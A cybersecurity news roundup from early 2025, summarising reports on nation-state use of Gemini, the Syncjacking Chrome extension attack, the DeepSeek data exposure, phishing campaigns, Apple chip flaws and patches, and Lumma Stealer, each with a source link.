Google: Over 57 Nation-State Threat Groups Using AI for Cyber Operations

Over 57 nation-state threat groups, including those from China, Iran, North Korea, and Russia, are using Google-powered AI, notably Gemini, for cyber operations. These groups primarily use AI for research, troubleshooting code, and creating content. Iranian group APT42 utilizes Gemini extensively for phishing and reconnaissance, while Chinese APTs leverage it for network infiltration tactics. Russian actors focus on converting malware, and North Koreans use it for job applications to infiltrate Western companies. Google highlights the urgent need for public-private cooperation to enhance cyber defenses.

https://thehackernews.com/2025/01/google-over-57-nation-state-threat.html

New Syncjacking Attack Hijacks Devices Using Chrome Extensions

New Syncjacking attack exploits benign Chrome extensions to hijack devices via Google profile and browser takeover. Attackers create a malicious Google Workspace domain, trick victims into installing an extension, and gain access to their data after syncing. They further take control through a fake Zoom update, allowing extensive control over the victim's browser and files while remaining stealthy and requiring minimal user interaction.

https://www.bleepingcomputer.com/news/security/new-syncjacking-attack-hijacks-devices-using-chrome-extensions/

DeepSeek Exposes Database With Over 1 Million Chat Records

,

DeepSeek, a Chinese AI startup, exposed two unsecured databases with over 1 million plaintext chat records, API keys, and operational data. Discovered by Wiz Research during a security assessment, these databases allowed unauthorized access and SQL queries via a web interface. The exposure raises significant security concerns for DeepSeek and its users, as attackers could retrieve sensitive information and potentially exploit the company's internal systems. Wiz reported the issue, prompting DeepSeek to secure the databases promptly.

https://www.bleepingcomputer.com/news/security/deepseek-exposes-database-with-over-1-million-chat-records/

Microsoft Advertisers Phished Via Malicious Google Ads

, ,

Malicious Google ads target Microsoft advertisers, attempting to steal login info for Microsoft's ad platform. Attackers use cloaking techniques to redirect users and evade security, ultimately leading to a phishing page that mimics the legitimate site. The campaign highlights ongoing phishing threats in online advertising, urging users to verify URLs, utilize two-factor authentication, monitor accounts, and report suspicious ads.

https://www.malwarebytes.com/blog/news/2025/01/microsoft-advertisers-phished-via-malicious-google-ads

Apple Chips Can Be Hacked to Leak Secrets From Gmail, iCloud, and More

,

Vulnerabilities in Apple chips (A- and M-series) allow side-channel attacks, FLOP and SLAP, to leak sensitive data from browsers like Chrome and Safari. FLOP exploits the load value predictor to steal memory contents, affecting data from services like Gmail and iCloud, while SLAP targets the load address predictor, limited to Safari. Devices from 2021 onwards are affected. Researchers indicated potential mitigations, and Apple intends to address the issues, though they don't view them as immediate threats.

https://arstechnica.com/security/2025/01/newly-discovered-flaws-in-apple-chips-leak-secrets-in-safari-and-chrome/

Phishing Campaign Baits Hook With Malicious Amazon PDFs

,

Phishing campaign uses malicious PDFs claiming expired Amazon Prime memberships to trick users into revealing personal and financial data. Researchers at Palo Alto Networks Unit42 found 31 such PDFs linking to fake Amazon sites, utilizing cloaked domains to evade detection. Users are advised to be cautious of suspicious emails.

https://www.darkreading.com/cyberattacks-data-breaches/phishing-campaign-malicious-amazon-pdfs

DeepSeek Halts New Signups Amid “large-scale” Cyberattack

,

DeepSeek suspends new registrations on its AI chat platform due to a “large-scale” cyberattack, believed to be a DDoS attack. The platform recently gained attention for outperforming US models, causing a sell-off in US stocks. Existing users can still log in, but cybersecurity researchers report vulnerabilities in DeepSeek's model that could enable malicious outputs.

https://www.bleepingcomputer.com/news/security/deepseek-halts-new-signups-amid-large-scale-cyberattack/

Microsoft Tests Edge Scareware Blocker to Block Tech Support Scams

, ,

Microsoft is testing a new “scareware blocker” for Edge browser to detect and block tech support scams using local machine learning. It alerts users about potential scams and allows reporting to improve detection accuracy. Users can find the feature in Edge's privacy settings, and it enhances protection alongside Defender SmartScreen, which catalogs malicious sites.

https://www.bleepingcomputer.com/news/microsoft/microsoft-tests-edge-scareware-blocker-to-block-tech-support-scams/

Apple Users: Update Your Devices Now to Patch Zero-day Vulnerability

, ,

Apple users must update devices to fix a zero-day vulnerability actively exploited in iOS. Affected devices include iPhone XS and newer, certain iPads, macOS Sequoia, Apple Watch Series 6+, and Apple TV models. Users should check for updates in Settings and consider enabling Automatic Updates. The vulnerability, tracked as CVE-2025-24085, allows privilege escalation via a misuse of memory in Core Media.

https://www.malwarebytes.com/blog/news/2025/01/apple-users-update-your-devices-now-to-patch-zero-day-vulnerability

About the Security Content of iOS 18.3 and iPadOS 18.3

,

iOS 18.3 and iPadOS 18.3 security update released January 27, 2025, addresses multiple vulnerabilities affecting recent devices. Key fixes involve potential unauthorized access, denial-of-service risks, and privilege escalation. Each vulnerability is linked to specific CVE-ID, and Apple prioritizes user safety by withholding details until patches are available. For further details, consult the Apple security releases page.

https://support.apple.com/en-us/122066

Hacker Infects 18,000 “script Kiddies” With Fake Malware Builder

Hacker infects 18,000 “script kiddies” globally with fake malware builder, a trojanized XWorm RAT, which steals data and controls infected systems. The malware was spread through various platforms and included a kill switch, but many systems remain compromised. Security researchers disrupted the botnet using a mass uninstall command. Users are warned against trusting unsigned software from other criminals.

https://www.bleepingcomputer.com/news/security/hacker-infects-18-000-script-kiddies-with-fake-malware-builder/

Seasoning Email Threats With Hidden Text Salting

Cisco Talos reports a rise in email threats using hidden text salting to evade detection. This technique involves inserting invisible characters or comments in the HTML of emails, confusing parsers and spam filters. It tricks systems into misidentifying brand names and languages in phishing attempts. Success against this method requires advanced detection strategies, inspecting suspicious CSS properties, and utilizing AI-driven email security solutions.

https://blog.talosintelligence.com/seasoning-email-threats-with-hidden-text-salting/

Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection

,

Lumma Stealer uses fake CAPTCHAs for malware delivery in a global campaign targeting various sectors, particularly telecom. Attackers use social engineering to trick victims into executing commands outside the browser, evading security measures, leveraging techniques like process hollowing and PowerShell obfuscation to bypass defenses. The malware evolves continuously, making detection and prevention challenging, and Netskope provides proactive threat detection against this campaign.

https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection

Scroll to Top